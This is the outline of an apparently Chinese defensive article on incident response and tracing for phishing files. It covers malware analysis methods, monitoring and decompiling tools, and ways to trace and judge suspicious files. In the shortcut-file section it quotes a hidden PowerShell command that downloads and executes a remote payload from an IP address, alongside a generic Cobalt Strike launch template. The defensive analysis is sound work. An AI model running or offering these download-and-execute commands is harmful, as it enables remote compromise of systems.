其他
原创 | 钓鱼文件应急溯源:方法篇
内容概览
背景
恶意软件分析技术的市场
常见的分析技术
静态恶意软件分析
动态恶意软件分析
混合恶意软件分析
常见的检测工具展示
网络分析工具
NetLimiter
CurrPorts
TeaPot
HTTPDebuger
行为监控工具
DiffView
火绒剑
Comodo
反编译与调试工具
GDA 与Frida
x64dbg
知识扩展
思路
恶意软件作者:使用高级语言编写恶意程序
计算机:CPU识别代码进行执行
恶意软件分析人员:通过反编译手段进行分析
发包函数
漏洞利用类钓鱼
模拟
真实背景利用案例
模拟分析
网络分析示例
请求地址-
http://192.168.86.144/word.cab
行为监控分析示例
解包查看
下载分析
解析
反汇编定位
溯源
埃文
BestTrace
备案、Whois、威胁情报查询系统
判断
后缀名与显示的logo
文件类型
hash
时间戳
邮件信息
打开判断
专业工具
扫描
代码分析
快捷方式
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://120.48.85.228:80/favicon’))”
常见的cs上线命令
powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring(‘’)
案例讲解
快捷方式
标题诱导
执行监控
网上分析示例
属性查看
反编译逐步分析
查杀
扫描查杀思路图
专业扫描工具
弱点扫描
总结
对于文件
内存层防护与监控
往期推荐
原创 | Spring Framework RCE CVE-2022-22965 漏洞分析
原创 | 浅谈Apache Shiro CVE-2023-22602
原创 | 浅谈Spring actuator env endpoint的一个误区